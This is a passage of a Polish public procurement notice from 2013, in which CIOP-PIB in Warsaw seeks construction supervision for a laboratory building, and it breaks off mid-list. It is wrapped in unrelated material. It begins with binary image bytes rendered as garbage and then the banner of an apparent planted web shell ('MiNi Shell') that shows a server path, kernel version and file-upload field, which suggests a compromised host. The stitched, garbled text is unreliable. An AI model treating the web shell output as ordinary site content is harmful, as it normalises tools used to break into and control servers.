JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130913/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130913/186305-N-2013.html

<p class="kh_header"><b>Warszawa: Wykonanie usługi w zakresie pełnienia nadzoru inwestorskiego nad realizacją robót budowlanych związanych z wykonaniem budynku laboratoryjnego Centrum Badań i Rozwoju Technik Bezpieczeństwa Procesów Pracy i Środowiska (Tech-Safe-Bio) Centralnego Instytutu Ochrony Pracy - Państwowego Instytutu Badawczego w Warszawie. Nr postępowania EZ/ZP-16/2013</b><br>
<b>Numer ogłoszenia: 186305 - 2013; data zamieszczenia: 13.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centralny Instytut Ochrony Pracy - Państwowy Instytut Badawczy , ul. Czerniakowska 16, 00-701 Warszawa, woj. mazowieckie, tel. 22 613 46 19, 623 36 98, faks 22 623 36 93.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ciop.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowy Instytut Badawczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usługi w zakresie pełnienia nadzoru inwestorskiego nad realizacją robót budowlanych związanych z wykonaniem budynku laboratoryjnego Centrum Badań i Rozwoju Technik Bezpieczeństwa Procesów Pracy i Środowiska (Tech-Safe-Bio) Centralnego Instytutu Ochrony Pracy - Państwowego Instytutu Badawczego w Warszawie. Nr postępowania EZ/ZP-16/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie usługi w zakresie pełnienia nadzoru inwestorskiego nad realizacją robót budowlanych związanych z wykonaniem budynku laboratoryjnego Centrum Badań i Rozwoju Technik Bezpieczeństwa Procesów Pracy i Środowiska (Tech-Safe-Bio) Centralnego Instytutu Ochrony Pracy - Państwowego Instytutu Badawczego w Warszawie.
Przedmiot zamówienia obejmuje:
1)	w branży budowlanej: nadzór nad wykonaniem robót budowlanych zgodnie z projektem architektonicznym i konstrukcyjnym, budynku 4-kondygnacyjnego o powierzchni netto 5.883 m2 wraz z wolnostojącym budynkiem stacji  transformatorowej oraz nadzór geotechniczny nad wykonaniem robót ziemnych (wykopy pod fundament); 
2)	w branży sanitarnej: nadzór nad wykonaniem instalacji sanitarnych, na które składają się: instalacje grzewcze c.o. i c.t., grzewczo-chłodzące w oparciu o system VRV IV, wentylacja mechaniczna, wentylacja i klimatyzacja pomieszczeń laboratoryjno-analitycznych, odciągi miejscowe (w tym podłączenia do dygestoriów), instalacje wody gospodarczej z.w., instalacja wody szarej, instalacja wodociągowa przeciwpożarowa; kanalizacja: bytowa, deszczowa, technologiczna i skroplin; instalacja sprężonego powietrza, węzeł cieplny oraz przyłącza: ciepłownicze, wodociągowe, kanalizacji fekalnej, sieci i przyłącza kanalizacji deszczowej;
3)	w branży elektrycznej: nadzór nad wykonaniem robót w zakresie instalacji elektrycznych (siły, oświetlenia, uziemień), stacji transformatorowej wraz z przyłączem do projektowanego budynku oraz instalacji teletechnicznych obejmujących w szczególności: system sygnalizacji pożaru, system kontroli dostępu, system sygnalizacji włamania i napadu, CCTV, BMS, system przyzywowy, system informacyjny, instalację okablowania strukturalnego (instalacja telefoniczna i informatyczna) oraz przyłącza energetyczne i teleinformatyczne, łączące budynek laboratoryjny z istniejącym budynkiem CIOP-PIB;
4)	w branży drogowej: nadzór nad wykonaniem robót zgodnie z projektem zagospodarowania terenu oraz projektem drogowym.

Obowiązki Wykonawcy w okresie poprzedzającym realizację budowy obejmują w szczególności:
1.	Zapoznanie się z dokumentacją projektową, specyfikacjami technicznymi wykonania i odbioru robót budowlanych, z umową o roboty budowlane, warunkami pozwolenia na budowę, jak również z terenem budowy i istniejącymi urządzeniami.
2.	Opracowanie i przedstawienie do akceptacji Zamawiającemu schematu organizacyjnego zespołu Wykonawcy wraz ze szczegółowym zakresem uprawnień i obowiązków jakie zamierza powierzyć poszczególnym członkom zespołu oraz wskazanie koordynatora zespołu nadzoru.
3.	Dostarczenie przed dniem podpisania umowy oświadczeń inspektorów nadzoru wchodzących w skład zespołu, stwierdzających przyjęcie obowiązków inspektorów nadzoru nad inwestycją.

Obowiązki Wykonawcy na etapie prowadzenia robót budowlanych obejmują w szczególności:
1.	Przygotowanie dokumentów do powiadomienia organu nadzoru budowlanego o terminie rozpoczęcia robót budowlanych.
2.	Ścisłą współpracę z projektantami pełniącymi nadzór autorski.
3.	Reprezentowanie Zamawiającego na budowie przez sprawowanie kontroli zgodności realizacji robót z dokumentacją projektową, w szczególności z projektem budowlanym, projektami wykonawczymi, specyfikacjami technicznymi wykonania i odbioru robót budowlanych, pozwoleniem na budowę, wiedzą techniczną i praktyką inżynierską.
4.	Nadzorowanie budowy w celu sprawdzenia jakości wykonywanych robót oraz wbudowywanych materiałów, zgodnie z wymaganiami dokumentacji projektowej, specyfikacjami technicznymi wykonania i odbioru robót budowlanych, wiedzą techniczną i praktyką inżynierską.
5.	Przeprowadzanie kontroli robót z częstotliwością zapewniającą skuteczny nadzór oraz realizację potrzeb Zamawiającego i wykonawcy robót budowlanych.
6.	Dostosowanie czasu pracy do czasu pracy wykonawcy robót i wymagań Zamawiającego.
7.	Obowiązek stawienia się na placu budowy niezwłocznie, nie później niż w ciągu 4 godzin od otrzymania informacji.
8.	Nadzór z prawem dokonywania zapisów w dzienniku budowy wyłącznie w zakresie powierzonych czynności inspektorom nadzoru.
9.	Organizację nadzoru w sposób zapewniający terminowość dokonywanych odbiorów robót i prób technicznych oraz eliminację możliwości powstawania opóźnień w realizacji.
10.	Kontrolowanie przestrzegania na budowie zasad bezpieczeństwa i higieny pracy, przepisów p.poż. i utrzymania porządku.
11.	Wstrzymywanie robót prowadzonych w sposób zagrażający bezpieczeństwu ludzi, mienia lub niezgodnie z wymaganiami umowy zawartej przez Zamawiającego z wykonawcą robót budowlanych i niezwłoczne pisemne zawiadomienie Zamawiającego o tym fakcie.
12.	Kontrolę prawidłowości prowadzenia dziennika budowy.
13.	Obowiązek dokonywania na bieżąco przeglądu dziennika budowy oraz potwierdzania swojej obecności i wykonywanych czynności stosownym wpisem.
14.	Wydawanie kierownikowi budowy lub kierownikom robót poleceń, potwierdzonych wpisem w dzienniku budowy, dotyczących usuwania nieprawidłowości lub zagrożeń, wykonywania prób lub badań, także wymagających odkrycia robót lub elementów zakrytych lub zanikających oraz przedstawiania wyników badań  Zamawiającemu dotyczących prowadzonych robót budowlanych.
15.	Żądanie od kierownika budowy lub kierowników robót dokonywania poprawek bądź ponownego wykonywania wadliwie wykonanych robót, a także wstrzymywania dalszych robót budowlanych w przypadku, gdyby ich kontynuacja mogła wywołać zagrożenie bądź spowodować niedopuszczalną niezgodność z dokumentacją projektową lub pozwoleniem na budowę.
16.	W przypadku wykonywania robót dodatkowych lub zamiennych Wykonawca, działając ściśle w porozumieniu z Zamawiającym, spisze z kierownikiem budowy i przedstawicielem Zamawiającego protokół konieczności, podając przybliżony koszt tych robót i wystąpi z wnioskiem do Zamawiającego w sprawie ich wykonania oraz opracowania niezbędnej dokumentacji projektowej, zaopiniuje powyżej wymienioną dokumentację kosztorysową wykonaną przez wykonawcę robót budowlanych.
17.	Stwierdzenie aktualnego stanu robót w razie przerwy w robotach oraz w innych wypadkach, gdy zachodzi potrzeba ustalenia ilości i wartości robót w zakresie niezbędnym do rozliczeń z Zamawiającym.
18.	W porozumieniu z Zamawiającym, każdorazowe zawiadomienie właściwego organu nadzoru budowlanego o wypadku naruszenia przez wykonawcę robót budowlanych prawa budowlanego, zasad dotyczących bezpieczeństwa budowy i ochrony środowiska, a także o rażących nieprawidłowościach lub uchybieniach technicznych.
19.	Reprezentowanie Zamawiającego, tylko na jego wniosek, w kontaktach z osobami trzecimi w sprawach związanych z realizacją robót budowlanych.
20.	Kontrolę, sprawdzanie autentyczności i przechowywanie dokumentów jakości, atestów, certyfikatów, aprobat technicznych, deklaracji zgodności, protokołów badań, protokołów pomiarów, instrukcji obsługi w celu niedopuszczenia do zastosowania materiałów wadliwych lub niedopuszczonych do stosowania w budownictwie na terenie Polski. Ocena ich zgodności z dokumentacją projektową i specyfikacjami technicznymi wykonania i odbioru robót budowlanych, a w przypadku zastosowania przez wykonawcę robót materiałów i urządzeń równoważnych ocena ich równoważności w uzgodnieniu z nadzorem autorskim i Zamawiającym.
21.	Organizowanie i przewodniczenie w naradach dotyczących postępu robót, w których udział będą brać przedstawiciele wszystkich zaangażowanych w realizację robót budowlanych stron oraz sporządzanie protokołów z tych narad, i przekazywanie ich Zamawiającemu i wykonawcy robót budowlanych.
22.	Bieżące egzekwowanie ustaleń z narad technicznych dotyczących postępu prac i jakości robót budowlanych.
23.	Monitorowanie postępu robót pod względem technicznym, finansowym, organizacyjnym i czasowym, sprawdzanie ich zaawansowania z obowiązującym harmonogramem rzeczowo-finansowym i udzielanie wszystkich niezbędnych informacji w tym zakresie.
24.	Wydawanie wykonawcy i podwykonawcom robót budowlanych poleceń dotyczących wykonywania dodatkowych badań materiałów lub robót budzących wątpliwość co do ich jakości, po uprzedniej akceptacji Zamawiającego.
25.	Zatwierdzanie rysunków roboczych i warsztatowych sporządzanych przez Wykonawcę robót budowlanych oraz ich archiwizowanie.
26.	Zatwierdzanie dokumentacji powykonawczej, sporządzonej przez wykonawcę robót budowlanych oraz jej archiwizowanie.
27.	Sprawdzanie zestawień ilościowych i wartościowych wykonanych robót po zakończonym etapie robót, będących podstawą do rozliczeń finansowych Zamawiającego z wykonawcą robót budowlanych, na podstawie harmonogramu rzeczowo-finansowego.
28.	Przygotowywanie wykazu środków trwałych zawierającego pozycje przewidziane drukiem OT t.j.: nazwę środka trwałego, symbol układu klasyfikacyjnego, charakterystykę, dostawcę i wykonawcę, nr i datę dowodu dostawy, łączną wartość netto zawierającą koszty montażu i ewentualnego instruktażu.
29.	Nadzorowanie przeprowadzonych prób i rozruchów oraz weryfikację i zatwierdzanie opracowanych przez wykonawcę robót budowlanych instrukcji eksploatacyjnych, w celu ułatwienia przekazania Zamawiającemu budynku do eksploatacji.
30.	Dokonywanie bez zbędnej zwłoki odbioru robót zanikających i ulegających zakryciu oraz dokumentowanie tych czynności.
31.	Sprawdzanie wykonanych robót i powiadamianie wykonawcy robót budowlanych o wykrytych wadach, określanie zakresu koniecznych do wykonania robót poprawkowych.
32.	Przeprowadzanie odbiorów częściowych oraz odbioru końcowego robót budowlanych, sprawdzanie kompletności i prawidłowości przedłożonych przez wykonawcę robót budowlanych dokumentów wymaganych do odbiorów.

Obowiązki Wykonawcy związane z odbiorem budynku i uzyskaniem pozwolenia na użytkowanie, obejmują w szczególności:
1.	Przeprowadzanie kontroli przed odbiorem końcowym oraz przygotowanie listy wad oraz wykazu brakujących dokumentów, które miałyby być złożone zgodnie z umową przez wykonawcę robót budowlanych.
2.	Po zakończeniu robót potwierdzenie wpisu kierownika budowy o gotowości do odbioru oraz należytego uporządkowania terenu budowy i terenów przyległych.
3.	Zweryfikowanie i zatwierdzenie kompletnej dokumentacji powykonawczej, a następnie dostarczenia jej do Zamawiającego wraz z dokumentacją związaną z nadzorowaną budową, w formie ustalonej z Zamawiającym.
4.	Współdziałanie z wykonawcą robót budowlanych i Zamawiającym w celu uzyskania decyzji o pozwoleniu na użytkowanie.

Obowiązki Wykonawcy związane z rozliczaniem robót budowlanych obejmują w szczególności:
1.	Rozliczenie umowy o roboty budowlane w przypadku jej zakończenia lub w przypadku odstąpienia od umowy.
2.	Kontrolę prawidłowości wystawienia faktury przez wykonawcę robót budowlanych.
3.	Sprawdzanie obmiarów stanowiących podstawę rozliczeń robót dodatkowych i zamiennych.
Obowiązki Wykonawcy związane z okresem gwarancji i rękojmi obejmują w szczególności:
1.	Udział w komisjach w sprawie zgłaszanych przez Zamawiającego usterek i wad.
2.	Udział w rocznych przeglądach gwarancyjnych i w przeglądzie w związku z upływem terminu gwarancji i rękojmi udzielonego przez wykonawcę robót budowlanych.
Zamawiający zastrzega możliwość unieważnienia postępowania, jeśli środki pochodzące z budżetu Unii Europejskiej, które Zamawiający zamierza przeznaczyć na sfinansowanie całości zamówienia, z przyczyn prawnych, nie będą mogły zostać wykorzystane..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp, dotychczasowemu Wykonawcy, stanowiących nie więcej niż 50% wartości zamówienia podstawowego, w okresie 3 lat od udzielenia zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia - Załącznik nr 1 do wniosku o dopuszczenie do udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca przedłoży wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług, w okresie ostatnich trzech lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej jedną usługę nadzoru inwestorskiego w budynku o powierzchni netto minimum 5.500 m2, łącznie w ramach następujących branż: konstrukcyjno-budowlanej, instalacji sanitarnej, instalacji elektrycznej, drogowej i geotechnicznej. 
Zamawiający, w przypadku gdy przedmiotem zamówienia są świadczenia okresowe i ciągłe, dopuszcza nie tylko zamówienia wykonane (tj. zakończone), ale również wykonywane. W takim przypadku część zamówienia już faktycznie wykonana musi wypełniać wymogi określone przez Zamawiającego.
Zaleca się złożenie wykazu usług na formularzu stanowiącym Załącznik nr 3 do wniosku o dopuszczenie do udziału w postępowaniu. Wykonawca zobowiązany jest przedstawić dokumenty potwierdzające, że usługi zostały wykonane lub są wykonywane należycie w formie referencji lub poświadczenia, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być  wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia - Załącznik nr 1 do wniosku o dopuszczenie do udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca przedłoży wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, tj. legitymujących się doświadczeniem zawodowym i kwalifikacjami odpowiednimi do stanowisk, które zostaną im powierzone (kluczowy personel) wymienionymi poniżej:
Inspektor nadzoru w specjalności konstrukcyjno-budowlanej/robót ogólnobudowlanych, który będzie pełnił też funkcję Koordynatora czynności nadzoru inwestorskiego, minimalna liczba osób - 1, posiadający wymagane uprawnienia budowlane (bez ograniczeń) dla nadzorowania przedmiotowych robót oraz posiadający minimum 3-letnie doświadczenie zawodowe jako Inspektor nadzoru robót konstrukcyjno-budowlanych/robót ogólnobudowlanych, w tym przy nadzorze wybudowania co najmniej jednego budynku, o powierzchni netto minimum 5.500 m2;
Inspektor nadzoru w specjalności instalacyjno-sanitarnej/Inspektor nadzoru robót sanitarnych, minimalna liczba osób - 1; posiadający wymagane uprawnienia budowlane (bez ograniczeń) dla nadzorowania przedmiotowych robót oraz posiadający minimum 3-letnie doświadczenie zawodowe jako Inspektor nadzoru robót instalacyjno-sanitarnych/robót sanitarnych, w tym przy nadzorze wybudowania co najmniej jednego budynku, o powierzchni netto minimum 5.500 m2;
Inspektor nadzoru w specjalności elektrycznej, minimalna liczba osób - 1; posiadający wymagane uprawnienia budowlane (bez ograniczeń) dla nadzorowania przedmiotowych robót oraz posiadający minimum 3-letnie doświadczenie zawodowe jako Inspektor nadzoru robót elektrycznych i elektroenergetycznych/robót elektrycznych, w tym przy nadzorze wybudowania co najmniej jednego budynku, o powierzchni netto minimum 5.500 m2, wyposażonego w BMS i sieci teletechniczne;
Inspektor robót drogowych, minimalna liczba osób 1, posiadający wymagane uprawnienia oraz posiadający minimum 3-letnie doświadczenie zawodowe;
Inspektor nadzoru o specjalizacji geotechnicznej, minimalna liczba osób - 1; posiadający minimum 3-letnie doświadczenie w nadzorze geotechnicznym, w tym przy wybudowaniu co najmniej jednego budynku z głębokim fundamentowaniem (spód ław fundamentowych na głębokości co najmniej - 4 mppt), posiadający Certyfikat Geotechniczny, wydany przez Polski Komitet Geotechniki, lub inny podmiot, o ile kwalifikacje danej osoby są uznawane na podstawie ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej z dnia 18 marca 2008 r. (Dz. U. z 2008 r. nr 63, poz. 394).
Zamawiający nie wyraża zgody na wskazanie jednej osoby do pełnienia kilku funkcji.
Wykonawca może polegać na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. W takiej sytuacji Wykonawca jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. 
Jeżeli Wykonawca, wykazując spełnianie warunków opisanych przez Zamawiającego polega na zasobach innych podmiotów na zasadach określonych w art. 26. ust. 2b ustawy Pzp, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda od Wykonawcy przedstawienia we wniosku o dopuszczenie do udziału w postępowaniu, w odniesieniu do tych podmiotów dokumentów wymienionych w Sekcji III.4.2).
Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy Pzp polega na zasobach innych podmiotów na zasadach określonych w art. 26. ust. 2b ustawy Pzp, Zamawiający w celu oceny, czy Wykonawca będzie dysponował zasobami tych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda przedstawienia dokumentów dotyczących w szczególności:
a) zakresu dostępnych Wykonawcy zasobów innego podmiotu,
b) sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia,
c) charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,
d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.
Zamawiający zaznacza, iż powołanie się przez Wykonawcę na wiedzę i doświadczenie innego podmiotu w celu potwierdzenia spełniania warunku udziału w postępowaniu, dopuszczalne jest wyłącznie w sytuacji, gdy ten podmiot będzie uczestniczył w wykonaniu zamówienia co najmniej w zakresie wykonania usług jakimi potwierdził spełnienie warunku opisanego w Sekcji III.3.2.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca posiada opłaconą polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę nie niższą niż 500.000 zł.
Jeżeli wartości usług określone zostały w walucie innej niż PLN, Wykonawca przeliczy je na PLN przyjmując jako podstawę średni kurs danej waluty opublikowany przez Narodowy Bank Polski (wg tabeli A kursów średnich walut obcych) w dniu publikacji niniejszego ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. Jeśli publikacja ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych nastąpi w dniu, w którym Narodowy Bank Polski nie publikuje tabeli kursów średnich, Wykonawca przyjmie jako podstawę przeliczenia kurs z tabeli kursów średnich opublikowany w dniu najbliższym po dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zamawiający informuje, że za główne usługi uzna te, które są wymienione na potwierdzenie spełniania warunku udziału w postępowaniu - wiedzy i doświadczenia oraz na potwierdzenie kwalifikacji Wykonawcy.;</li>

